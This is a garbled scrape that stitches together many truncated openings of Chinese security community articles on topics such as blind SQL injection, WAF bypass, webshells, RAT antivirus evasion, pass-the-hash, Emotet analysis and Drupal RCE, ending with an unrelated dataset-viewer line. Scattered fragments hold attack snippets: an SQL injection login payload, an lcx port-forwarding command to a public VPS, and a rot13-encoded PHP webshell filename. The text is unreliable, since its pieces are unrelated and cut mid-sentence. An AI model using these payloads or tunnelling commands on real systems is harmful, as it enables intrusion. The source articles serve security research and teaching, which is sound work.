后门代码存在于 `nssock2.dll` 中,采用了多层加密 shellcode、花指令、线程注入等各种方式逃避杀软查杀和对抗人工分析。总体流程如下
#### 2\.... | 社区文章 |
# HVV行动之某OA流量应急
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:清水川崎@滴滴出行SSTG Basic Security Team
## 0x01 写在前面
朋友在2021年HVV中作为防守方抓到了一段流量,刚开始没有太过于在意,随后在t00ls论坛中也发现了这段流量,随即觉得事情并不简单。
## 0x02 触发点
根据流量可以得知路由为`/services%20/WorkflowServiceXml`,我随即查看了该OA的web.xml。
发现了相关类为`weaver.workflow.webservices.WorkflowServiceXml`、`weaver.wor... | 社区文章 |
**< 接上文>**
* * *
## 0x05 WAZUH整合
现在,我们已经完成了SIEM的部分。是时候将我们的解决方案从一个简单的观察者转变为一个积极的响应者了。我们所使用到的一个很重要的工具就是Wazuh。在本章节中,我们希望能让您了解这个工具的优势,以及如何部署和使用。本章节分为以下几个部分:
### 5.1 Wazuh服务端和agent的安装
Wazuh是一个免费的、开源的、企业级的安全监控解决方案,用于威胁检测、完整性监控、事件响应及合规性。
你需要知道的一些定义:
**Wazuh服务端:** 运行Wazuh manager、API和Filebeat。它从部署的agent收集和分析数据。
**Wazuh agent:*... | 社区文章 |
## 前言
本人有意写一份系列文章,主要内容是分享蚁剑改造过程中的一些技巧与经验。
因为蚁剑的相关文档实在比较少,可能很多同学都像自己当初一样想要二次开发可是不知如何下手。
不敢贸然称之为教程,只是把改造的过程发出来供大家借鉴,希望其他同学能够少走弯路。
## 正文
### 思路简介
大家都知道垃圾数据填充可以用于SQL注入的绕过,原理就是WAF在遇到大量的GET或者POST参数的时候就会直接把数据直接抛给后端,从而就可以绕过各种各样恶心的过滤,大家常常把这种方法叫做缓冲区溢出。
原因可能是WAF厂商考虑到防止自身程序对于流量分析时间过长,导致用户正常的业务无法访问,所以不得已直接丢给后端。因为咱也没看过WAF内部的规则是怎么写的,... | 社区文章 |
**作者:盘古实验室
公众号:<https://mp.weixin.qq.com/s/yMQN3MciI-0f3mzz_saiwQ>**
在完成了对 FaceTime
的一系列漏洞挖掘与研究后,我们决定对微信的音视频通信做一些分析。经分析后发现,当微信语音通话连接建立成功之后,微信客户端将解析远端发来的网络报文并还原成多媒体流。在还原解析的过程中,如果处理远端数据的代码存在问题时就会形成一个远程的攻击面。
在针对这个攻击面进行深入挖掘后我们发现了若干可以造成远程内存破坏的漏洞。本篇文章我们将选择一个比较有趣且复杂的漏洞进行深入的分析。该漏洞可以造成远程写溢出从而导致崩溃,其root
cause隐藏的非常深,触发流程也比较复杂。研... | 社区文章 |
# Drupal漏洞组合拳:通过恶意图片实现一键式RCE
##### 译文声明
本文是翻译文章,文章原作者 thezdi,文章来源:thezdi.com
原文地址:<https://www.thezdi.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
最近Drupal公布了两个关键补丁,支持7.x及8.x版本。在这个安全更新中修复了一些bug,最开始这些bug已提交到我们的[针对性漏洞激励计划](https://www.zero... | 社区文章 |
# Selenium&ddddocr识别验证码自动化爆破
# Selenium是什么?
Selenium可以模拟真实用户对URL中的元素进行操作。部分网站采用了一些流量校验算法,会将数据包中的进行加密,然后与计算出来的值进行比对,如果不能解密就加密的算法就很难使用burp爆破,及修改数据包的功能,而使用Selenium可以模拟人操作网站的行为,用户输入URL打开网站,选中输入框,输入内容,点击登录框。如果目标网站开启了一些校验,这些也会自动经过校验处理。而burp是直接跳过了这些操作,直接向服务器发送数据包。
# 前期准备
需要保证浏览器的大版本号,和浏览器的驱动程序匹配
* 下载Selenium[支持的浏览器](https:/... | 社区文章 |
## 前言
最近做了些基于布尔盲注和基于时间盲注的CTF题,掌握了CTF题中SQL盲注的三种解法,收获很大,于是结合题目分享一下。
## BASE-Blind-Inject
### 题目信息
### 题干分析
第一次走进误区,刚看到这道题的时候
看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入
" or 1=1#
果然注入进去了。虽然没有出现flag,但给予了提示“flag就在数据库里面”,然后又想到题目标题,翻译成“简单盲注”
并且flag在数据库?有页面返回?所以应该想到这是SQL注入的一种注入方式叫做布尔盲注,并且是POST型。
### 知识了解
**布尔盲注**... | 社区文章 |
# 深入剖析一个经修改后的Emotet银行木马下载器
|
##### 译文声明
本文是翻译文章
原文地址:<https://0ffset.wordpress.com/2018/06/13/post-0x10-another-emotet-downloader/>
译文仅供参考,具体内容表达以及含义原文为准。
你可能还记得我写过一篇文章,在文中我拆解了一个[Emotet
Downloader](https://0ffset.wordpress.com/2018/03/17/post-0x04-analysis-of-an-emotet-downloader/),它使用宏和Powershell命令从受感染的网站下载Emotet。现在,他... | 社区文章 |
# 【技术分享】如何检测PowerShell攻击活动
|
##### 译文声明
本文是翻译文章,文章来源:securityaffairs.co
原文地址:<http://securityaffairs.co/wordpress/65570/hacking/powershell-attacks.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**一、前言**
最近一阶段,我一直在分析研究客户... | 社区文章 |
# 任意RAT改加载器Bypass
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
沉寂许久,时隔良久,赴当年之约,感触良多。百川赴海返潮易,一叶报秋归树难。今天分享一篇任意RAT Bypass杀软的思路,
**提供思路仅供参考,不提供任何源码** 。文章中提到的地方若有错误的地方请指正。
直入主题,目前RedTeam的主流RAT无非就Cobalt
Strike。其他的RAT大多基于C/C#开发(这里不做讨论),小众点的RAT,BUG,兼容性等一系列体验感不是很好。而Cobalt
Strike的特征已经被各大厂商记录到特征库中,所以用Cobalt Strike做Bypass的效果... | 社区文章 |
本文由红日安全成员: **水清云影** 编写,如有不当,还望斧正。
## 前言
大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 [**PHP-Audit-Labs**](https://github.com/hongriSec/PHP-Audit-Labs) 。现在大家所看到的系列文章,属于项目
**第一阶段** 的内容,本阶段的内容题目均来自 [PHP SECURITY CALENDAR
2017](https://www.ripstech.com/php-security-calendar-2017/)
。对于每一道题目,我们均给出对应的分析,并结合... | 社区文章 |
> Author:vspiders
> 首发地址:<http://blog.csdn.net/vspiders/article/details/79643200>
## 前言
最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。于是便有此文。
* * *
## 0x01 PHP反序列化
说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不会保存对象的方法。
<?php
class A{
... | 社区文章 |
## 前言
这个漏洞是晏师傅发现的,该漏洞为后台任意文件删除,需要有管理员的权限,所以说危害非常小。晏师傅说,让我用这个洞的分析发个文章活跃下先知的账号,每天发发文章,比打游戏好多了。我觉得非常有道理,所以有了这篇文章。
## 项目地址
<https://gitee.com/ComsenzDiscuz/DiscuzX/tree/master>
直接用最新版测试。(discuz!x3.4)
## 代码分析
漏洞位置在\source\admincp\admincp_forums.php第1793-1799行。用正则搜索,往unlink函数中直接传入通过GET方法获取的变量,直接可以搜到。
存在漏洞的代码:
if(!$multis... | 社区文章 |
# IoT固件分析入门
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
把前段时间GitHub 上 star
了的一个项目学一遍,地址:[IoT_Sec_Tutorial](https://github.com/G4rb3n/IoT_Sec_Tutorial/)
访问慢的话,gitee上也有镜像可看
_Update:感觉算是一个很不错的IoT固件分析入门教程,今天收到《路由器0day》后在路上粗略地看了下目录,除了没有涉及到硬件外,这个教程差不多把固件分析的起始工作都涉及到了(至于是不是
a bit out of date 就另当别论,不过总的来说也还好⑧)_
## 0x0准备
因为kali... | 社区文章 |
原文来自:<https://bugs.chromium.org/p/chromium/issues/detail?id=788936>
翻译:聂心明
来自file:///的资源没有定义一个Content-Type,一个恶意页面将加载任何本地资源作为css,并且它独立于MIME类型,浏览器会将其进行解析。他允许通过css注入的方式来跨域泄露本地文件数据。这个是这个漏洞
<https://bugs.chromium.org/p/chromium/issues/detail?id=419383> 的小变体。
chrome浏览器似乎用文件拓展名作为MIME类型,当怀疑解析了一个错误的资源的时候,就会弹出一个警告:“资源被解析成样... | 社区文章 |
最近在项目中做内网横向渗透中遇到些以前没遇到过的问题,暂未找到原因,希望有经验的大佬给予指教,万分感谢。
* * *
简述下环境,客户网络分DMZ区域跟办公区域,通过DMZ区域的WEB服务器代理来进行测试(某台服务器可以通到办公区)其中DMZ区域中的服务器大多为2012,而办公区域多为win7和win10,遇到的问题如下:
1.在获取到某个内网通用账户的情况下,采用哈希传递和impacket工具包均无法进入办公区工作机(DMZ区域的服务器可以正常利用),报错截图下面会发出来。见图1.2.3
2.利用schtasks报特定的安全包错误,不知道是什么原因导致的。报错见图4。
3.忘了说了,通过卡巴斯基安全中心服务器(有权限)... | 社区文章 |
# 谨防Magic SpEL - Part 1(CVE-2018-1273)
##### 译文声明
本文是翻译文章,文章来源:http://blog.h3xstream.com/
原文地址:<http://blog.h3xstream.com/2018/05/beware-of-magic-spell-part-1-cve-2018.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
今年2月,我们使用一款安全漏洞扫描软件,在Spring Framework组件上至少扫描了100多个模块,包括核心部件(spring-core,
spring-mvc)和可选组件(spring-data, spring-social... | 社区文章 |
**作者:LoRexxar'@知道创宇404实验室
时间:2020年10月30日**
# 前言
前段时间开源新版本KunLun-M的时候,写了一篇[《从0开始聊聊自动化静态代码审计工具》](https://lorexxar.cn/2020/09/21/whiteboxaudit/)的文章,里面分享了许多在这些年白盒静态扫描演变过程中出现的扫描思路、技术等等。在文章中我用了一个简单的例子描述了一下基于.QL的扫描思路,但实际在这个领域我可能只见过一个活的SemmleQL(也就是CodeQL的原型)。这篇文章中我也聊一聊这相关的东西,也分享一些我尝试探索的一些全新的静态扫描方案。
本文提到的小demo phpunserializec... | 社区文章 |
# 如何绕过Cisco WebEx Meetings Desktop App最新补丁
|
##### 译文声明
本文是翻译文章,文章原作者 srcincite,文章来源:srcincite.io
原文地址:<https://srcincite.io/blog/2018/12/03/webexec-reloaded-cisco-webex-meetings-desktop-app-lpe.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
前一段时间,[Ron Bowes](https://twitter.com/iagox86)发现Cisco WebEx Meetings Desktop
App中存在一个漏洞,... | 社区文章 |
# 如何分析Linux恶意程序
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
近期接手了不少Linux恶意程序的分析任务,在处理任务的过程中,当然会参考网络中的一些技术文档,于是就发现了一个问题:在各大平台上,关于Linux恶意程序的分析介绍相对较少;所以,自己就想对这方面的知识进行一些弥补,把自己对Linux恶意程序的分析方法和思路提炼分享出来,供大家参考交流。
本篇文章中提到的所有方法均是在本人实际工作中接触使用并提炼出来的,例如:当遇到的rootkit会从自身解密ELF模块,并将其加载进内存中时,才发现详细了解ELF文件结构是多么的重要;当使用IDA远程调试,代码执行... | 社区文章 |
# 【技术分享】基于内存的无文件恶意软件感染超过140家银行、电信和政府企业(附检测方法)
|
##### 译文声明
本文是翻译文章,文章来源:securelist.com
原文地址:<https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[pwn_361](http://bobao.360.cn/member/contribute?uid=2798962642)
预估稿费:190RMB
投稿方式:发送邮件至[linwei#360.cn](mail... | 社区文章 |
# 前言
闲着无聊看了看 TP5.0 的反序列化链,突然发现网上的大部分链最后用的 `filename`
都是这样的:`php://filter/write=string.rot13/resource=<?cuc
@riny($_TRG[_]);?>/../a.php`
因为某些原因需要在 `filename` 上做些手脚,并且 `filename` 和 `value` 的值基本是一样的,我们可以假设他是这样的:
<?php
$filename = "php://filter/write=string.rot13/resource=<?cuc @riny($_TRG[_]);?>/../a.php";
$v... | 社区文章 |
# SQLServer攻击姿势与防护总结
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01
之前也算是负责一个渗透项目,基本上都是MSSQL的服务器,这里写一下当时的渗透过程中用到的一些技巧之类的吧,各路大佬轻喷。
## 0x02
### 2.1 简介
从上次的项目里遇到的基本上都是ASP.NET + SQL Server 架构的服务器,因为MSSQL 只能运行在 **Windows**
平台上,如果攻击者获取了sa账号,就能够较为方便的获得高权限用户。
**MSSQL权限分类** (2008)
Dbcreator:这个服务器角色的成员可以创建、更改、删除和还原任何数据库。
... | 社区文章 |
本文分析研究人员之前见过的macOS恶意软件驻留技术。
不管是加密货币挖矿、广告恶意软件劫持、或监听用户的恶意软件都有一个共同点:就是需要在终端上实现驻留。在苹果macOS平台上,攻击者有多种方法来实现驻留。下面对研究人员之前见过的macOS恶意软件驻留技术进行分析。
# LaunchAgent
在macOS上实现驻留的最常见方式是通过LaunchAgent。Mac用户在Library文件夹下都有一个LaunchAgent文件夹,用来指定用户每次登陆后要执行的代码。系统还有一个自己的`LaunchAgents`文件夹。因为该文件夹是由于macOS自己管理的,默认请求下恶意软件不会进入该文件夹。
LaunchAgents以`pro... | 社区文章 |
# Moonraker靶机渗透测试
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
近日闲的无聊就找了个靶机玩玩,技术太菜,第一次写这个渗透测试,写的不好还请多多指教。
## 靶机搭建与下载
Moonraker靶机下载地址:<https://pan.baidu.com/s/1Hb8NgDjJiFuygeDrAaWVOA>提取码: 22ja
Monraker靶机ip: 192.168.56.150
kali攻击者ip : 192.168.56.1
说明: 获取目标主机的root权限并读取目录中的flag.txt文件
## 知识点
nmap
dirb
Burp修改Cookies
Couc... | 社区文章 |
# 【技术分享】从hash传递攻击谈相关Windows安全机制
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
作者:existX@Syclover(三叶草安全技术小组)
预估稿费:400RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**前言**
**path-the-hash,中文直译过来就是hash传递,在域中是一种比较常用的攻击方式。**
在网上所找到的资料,大多数是介绍如何实现此类攻击,但对于它背后所隐藏的关于Windows安全机制的一些知识,却鲜有探讨。 **本文的目的就是从pass-the-hash这一古老... | 社区文章 |
# 记Hitcon 2018的一道pwn题 —— 《hitcon》 writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
这道题在比赛中并没有解出来,而是在赛后才解出来,不过这题也花了我挺长时间的
做完之后不得不感叹hitcon的出题质量非常之高
## 正式分析
首先我们来看下main函数
前面有几个函数
setup函数是常规的初始化,读了/dev/urandom的四个字节作为seed
init_papers 函数是初始化paper,从papers.txt文件里面读取
然后循环里面有4个功能,前两个只是简单的打印内容,没什么有用的地方
重点分析的是后两个功能
### sc... | 社区文章 |
### 0x00 概述
本篇为.NET的代码审计思路,所以这里就详细的呈现一个完整的.NET程序审计过程,因为是审计思路,可能文中不会涉及到漏洞利用相关。.NET的程序一般为单入口,所以审计起来算是比较轻松的。因为程序为收费软件,为了避免不必要的麻烦,就不透露是什么程序了。
### 0x01 系统重装
在install/default.aspx中,我们找到第一行,这里是引用DLL文件程序的位置。
找到DLL的位置,DLL的位置为Helpdesk.Install._Default,我们打开它。
首先程序获取了我们提交过来的数据库各个参数,随后进行了if为空判断,如果不为空则进入了下面else
if判断,这里判断了目录下的loc... | 社区文章 |
# 【技术分享】CLR在SQL Server中的利用技术分析
|
##### 译文声明
本文是翻译文章,文章来源:360网络安全响应中心
原文地址:<http://mp.weixin.qq.com/s/EwCwwjzP1lzNGNaihFgGww>
译文仅供参考,具体内容表达以及含义原文为准。
**0x00 前置知识**
CLR:通用语言运行平台(Common Language
Runtime,简称CLR)是微软为他们的.NET的虚拟机所选用的名称。它是微软对通用语言架构(CLI)的实现版本,它定义了一个代码运行的环境。CLR运行一种称为通用中间语言的字节码,这个是微软的通用中间语言实现版本。
存储过程:是一种在数据库中存储复杂程序... | 社区文章 |
本文由 [@D0g3](https://www.d0g3.cn/about) 编写
i-SOON_CTF_2021 部分题目环境/源码后续将在Github开源
[项目地址](https://github.com/D0g3-Lab/)
# WEB
## EZ_TP
首先 www.zip 源码下载,找到路由,`/?s=/index/index/hello`,简单的变量覆盖,能读文件但找不到 flag ,看到 5.1.37
版本,考虑 phar 反序列化漏洞,网上找了个 exp ,再生成 phar 文件。
POC:
<?php
namespace think {
abstract class Model... | 社区文章 |
**原文:[Aggressive in-app advertising in Android](https://securelist.com/in-app-advertising-in-android/97065/ "Aggressive in-app advertising in Android")**
**译者:知道创宇404实验室翻译组**
近期,Google Play上流行应用程序中的[可疑广告模块](https://securelist.com/dropper-in-google-play/92496/)越来越多,其观看次数也在不断增加,与白名单广告模块相比,它们为开发人员带来了更多收入,但此类SDK的获利方法可能会对... | 社区文章 |
**作者:果胜**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!**
**投稿邮箱:paper@seebug.org**
在SOC的实践中,对安全事件的跟踪以及威胁溯源是安全预警和防御的重要步骤。目前安全社区和白帽黑客建立了多种事件情报的分享渠道,其中社交媒体是非常重要的组成部分,有很多组织和个人通过各类社交APP发布恶意软件,安全事件,漏洞和利用工具的相关信息。故而目前许多安全人员都开始通过SOCMINT(社交媒体情报)来辅助威胁跟踪和预警工作。由于国内外的法律和文化不同,目前国内的微博更重于舆情、安全事件的发布,而推特更重于漏洞,恶意软件等技术信息的发布,在威胁跟踪时可以根据自身的具... | 社区文章 |
# 再谈Python RASP
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前几天看了腾讯小哥七夜发的关于python rasp的文章,想到之前也做过类似的研究,也来谈谈我知道的几种解决方案吧
## 概述
RASP(Runtime application self-protection)运行时应用自我保护,在红方中的应用一般有以下几种:
1、配合实现IAST,在SDL中使用作为精准的检测方案
2、应用层agent,用来弥补系统层agent难以还原原始攻击手法的缺陷
3、动态解密,对于变形和动态执行的恶意代码或者webshell来说,rasp是最清晰的解密
## 几种实现方案概述... | 社区文章 |
本文来自 知道创宇404实验室 [@Hcamael](http://0x48.pw/)
这几天在研究方程式泄露的EXTRABACON(EXBA)PoC, 网上没找到能成功的远程, 所以准备自己本地搭环境,
然后看到了这篇文章<http://www.freebuf.com/vuls/112589.html>
这篇文章是在方程式信息泄露后看过的对我最有帮助的文章了, 不过尴尬的是, 文章中复现环境是Windows下使用VM, 可是我的环境却是Linux+VBox
表示我的Windows都是用来打游戏的, 啥工具都没有, 仔细看了下文章, 准备去搜搜Linux+VBox的解决方案
首先是虚拟机镜像文件这些东西: <http://l.0x4... | 社区文章 |
## 0x00 认识IAST
笔者初识IAST,未曾深入接触,源于兴趣开始学习,可能有理解不到位的地方,请多多包涵指导。
IAST全称Interactive Application Security Testing 交互式应用程序安全测试,它在程序运行过程中使用
**插桩技术监控和收集信息**
,根据这些信息来判断程序是否存在告警。它对来自客户端产生的请求和响应进行分析,这点类似于DAST;而它能够监控数据流信息,通过污点分析产生告警又类似于SAST。IAST有很多种模式,代理模式、流量镜像模式,插桩模式等,可参考<https://www.freebuf.com/articles/web/290863.html。>
本次重点介绍插桩... | 社区文章 |
连接示意图
VPS 服务器上用 lcx 工具进行端口监听
lcx -listen 5353 3535
Attack Target (Windows Server 2003) 服务器上运行 Msf后门并用 lcx 工具进行端口转发
Windows Server 2003 网络配置
运行 Msf 后门程序
运行 lcx 工具链接 VPS 服务器进行本地端口转发
lcx -slave 172.87.24.247 5353 127.0.0.1 9009
(VPS 上可看到来自 Attack Target 的网络连接)
## BackBox 上启动 msfconsole 进行后门链接
[Backbox
网络配置](https://www.se... | 社区文章 |
接[上篇](http://paper.seebug.org/107/),本篇翻译自原文后部分,本文有增改
原文:http://d3adend.org/blog/?p=851
原作者: **Neil Bergman**
译: **Holic (知道创宇404安全实验室)**
* * *
### 寻找客户端 SQL 注入漏洞
目前为止我们已经使用 `catchform` 方法来利用 UXSS 漏洞,但是利用暴露的 `catchform` 方法在
`mxbrowser_default` 数据库中触发客户端 SQL 注入也是可行的,这可以远程破坏数据库的完整性和机密性。
考虑到下面的代码取自 `com.mx.browser.a.f` 类。当... | 社区文章 |
# 【技术分享】Pwn2Own 2017 再现上帝之手
##### 译文声明
本文是翻译文章,文章来源:腾讯安全湛泸实验室
原文地址:[https://media.weibo.cn/article?id=2309404105928097034074&jumpfrom=weibocom](https://media.weibo.cn/article?id=2309404105928097034074&jumpfrom=weibocom)
译文仅供参考,具体内容表达以及含义原文为准。
****
**0x背景**
今年3月结束的Pwn2own比赛中,湛泸实验室1秒内攻破史上最高难度的Edge浏览器,拿到首个单项最高分14分。此次比赛湛泸... | 社区文章 |
# 【技术分享】angr:基于python的二进制分析框架
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
**作者:**[ **** **desword**
****](http://bobao.360.cn/member/contribute?uid=2634189913)
**预估稿费:200RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至**[ **linwei#360.cn** ****](mailto:linwei@360.cn) **,或登陆**[
**网页版**](http://bobao.360.cn/contribute/in... | 社区文章 |
# 关于Shiro反序列化漏洞的一些思考
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
Shiro反序列化虽然被很多大佬们在前几年的学习中都总结的差不多了,但有些知识的总结思考还不是很具体。本文主要以抛出问题的方式,努力寻找在实际调试过程中遇到问题的真实答案,最后结合前辈们总结的知识点也用实践检验了知识点,特此记录。
## 0x01 漏洞简介
### 0x1 介绍
Shiro是一个强大而灵活的开源安全框架,它非常简单的处理身份认证,其中提供了登录时的RememberMe功能,让用户在浏览器关闭重新打开后依然能恢复之前的会话。
此次分析的漏洞是一个标准的反序列化漏洞,其原理是Cookie中的r... | 社区文章 |
## minhook源码阅读分析
minhook是一个inline
Hook的库,同时支持x32和x64系统,并且是开源的,地址在这里<https://www.codeproject.com/Articles/44326/MinHook-The-Minimalistic-x-x-API-Hooking-Libra>。下面就简单的分析一下它的工作过程。
### 0x1 调用实例
首先看一下官网上给出的c的调用的例子:
#include <Windows.h>
#include "./include/MinHook.h"
typedef int (WINAPI *MESSAGEBOXW)(HWND, LPCWST... | 社区文章 |
# 如何攻破PHP的垃圾回收和反序列化机制(上)
|
##### 译文声明
本文是翻译文章,文章来源:evonide.com
原文地址:<https://www.evonide.com/breaking-phps-garbage-collection-and-unserialize/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在本文中,我们主要介绍了PHP垃圾回收(Garbage Collection)算法中的两个Use-After-Free漏洞。其中一个漏洞影响PHP
5.3以上版本,在5.6.23版本中修复。另外一个漏洞影响PHP 5.3以上版本和PHP
7所有版本,分别在5.6.23和7.0.8版本中修复。这... | 社区文章 |
# MAR DASCTF题解
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 2021 MAR DASCTF题解,包括一道套路pwn题和一道2.32 uaf的pwn题,两个reverse 和
> 四道密码学。题目考察知识点比较新,也能够从中学习到一些新知识。
## Pwn
### fruitpie
题目的逻辑十分简单
int __cdecl main(int argc, const char **argv, const char **envp)
{
size_t size; // [rsp+4h] [rbp-1Ch]
char *chunk; //... | 社区文章 |
# DEFCON CHINA议题解读 | 欺骗图片搜索引擎
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1、介绍
在本次DEFCON China大会上,来自中国人民大学的弓媛君、梁彬教授及黄建军博士进行了题为“欺骗图片搜索引擎”的报告。
该工作揭示了一种新的安全威胁:被广泛应用于图片搜索引擎中的基于内容的图像检索系统(CBIR,即”以图搜图”)可能成为潜在的攻击目标,攻击者可以通过移除/注入图片关键点的手段绕开检索算法搜索。通过欺骗搜索引擎,攻击者可以避开图片相似度查询,达到图片内容抄袭等目的。
## 2、背景
基于内容的图像检索系统,即CBIR系统(Content-Based Imag... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.